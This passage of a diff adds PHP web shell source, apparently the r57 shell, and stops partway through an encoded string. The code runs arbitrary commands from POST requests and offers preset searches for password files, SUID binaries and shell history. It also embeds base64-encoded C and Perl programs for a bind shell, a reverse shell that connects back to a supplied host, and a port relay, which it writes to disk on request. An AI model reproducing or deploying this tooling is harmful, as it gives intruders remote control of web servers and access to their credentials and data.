+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_butt13'=>'Create/Delete',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+'eng_text77'=>'Show database structure',
+'eng_text78'=>'show tables',
+'eng_text79'=>'show columns',
+'eng_text80'=>'Type',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'Run SQL query',
+'eng_text84'=>'SQL query',
+);
+/*
+?????? ??????
+????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
+?? ?????? ???? ????????? ??? ???????? ???????.
+*/
+$aliases=array(
+'find suid files'=>'find / -type f -perm -04000 -ls',
+'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
+'find sgid files'=>'find / -type f -perm -02000 -ls',
+'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
+'find config.inc.php files'=>'find / -type f -name config.inc.php',
+'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
+'find config* files'=>'find / -type f -name "config*"',
+'find config* files in current dir'=>'find . -type f -name "config*"',
+'find all writable files'=>'find / -type f -perm -2 -ls',
+'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
+'find all writable directories'=>'find /  -type d -perm -2 -ls',
+'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
+'find all writable directories and files'=>'find / -perm -2 -ls',
+'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
+'find all service.pwd files'=>'find / -type f -name service.pwd',
+'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
+'find all .htpasswd files'=>'find / -type f -name .htpasswd',
+'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
+'find all .bash_history files'=>'find / -type f -name .bash_history',
+'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
+'find all .mysql_history files'=>'find / -type f -name .mysql_history',
+'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
+'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
+'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
+'list file attributes on a Linux second extended file system'=>'lsattr -va',
+'show opened ports'=>'netstat -an | grep -i listen',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Wingdings color=gray>?</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=Verdana size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$windows = 0;
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
+if(empty($dir))
+ {
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); }
+ if(empty($os)){ $os ="-"; $unix=1; }
+ else
+    {
+    if(@eregi("^win",$os)) { $windows = 1; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+        $r .= ($windows)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die();
+  }
+if($windows&&!$safe_mode)
+ {
+ $uname = ex("ver");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+else if($unix&&!$safe_mode)
+ {
+ $uname = ex("uname");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function we($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ???????? ? ???? '; }
+else { $text = "[-] ERROR! Can't write in file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function re($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ????????? ???? '; }
+else { $text = "[-] ERROR! Can't read file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function ce($i)
+{
+if($GLOBALS['language']=="ru"){ $text = "?? ??????? ??????? "; }
+else { $text = "Can't create "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function perms($mode)
+{
+if ($GLOBALS['windows']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\">";
+ return $ret;
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or we($fname);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+function DirFiles($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (FALSE !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(!is_dir($dir."/".$file))
+          {
+            if($types)
+            {
+              $pos = @strrpos($file,".");
+              $ext = @substr($file,$pos,@strlen($file)-$pos);
+              if(@in_array($ext,@explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirFilesWide($dir)
+  {
+    $files = Array();
+    $dirs = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+          {
+            $file = @strtoupper($file);
+            $dirs[$file] = '&lt;DIR&gt;';
+          }
+          else
+            $files[$file] = @filesize($dir."/".$file);
+        }
+      }
+      @closedir($handle);
+      @ksort($dirs);
+      @ksort($files);
+      $files = @array_merge($dirs,$files);
+    }
+    return $files;
+  }
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirPrintHTMLHeaders($dir)
+  {
+    $pockets = '';
+  	$handle = @opendir($dir) or die("Can't open directory $dir");
+    echo "    <ul style='margin-left: 0px; padding-left: 20px;'>\n";
+    while (false !== ($file = @readdir($handle)))
+    {
+      if ($file != "." && $file != "..")
+      {
+        if(@is_dir($dir."/".$file))
+        {
+          echo "      <li><b>[ $file ]</b></li>\n";
+          DirPrintHTMLHeaders($dir."/".$file);
+        }
+        else
+        {
+          $pos = @strrpos($file,".");
+          $ext = @substr($file,$pos,@strlen($file)-$pos);
+          if(@in_array($ext,array('.htm','.html')))
+          {
+            $header = '-=None=-';
+            $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file);
+            for($a=0;$a<count($strings);$a++)
+            {
+              $pattern = '(<title>(.+)</title>)';
+              if(@eregi($pattern,$strings[$a],$pockets))
+              {
+                $header = "&laquo;".$pockets[2]."&raquo;";
+                break;
+              }
+            }
+            echo "      <li>".$header."</li>\n";
+          }
+        }
+      }
+    }
+    echo "    </ul>\n";
+    @closedir($handle);
+  }
+
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
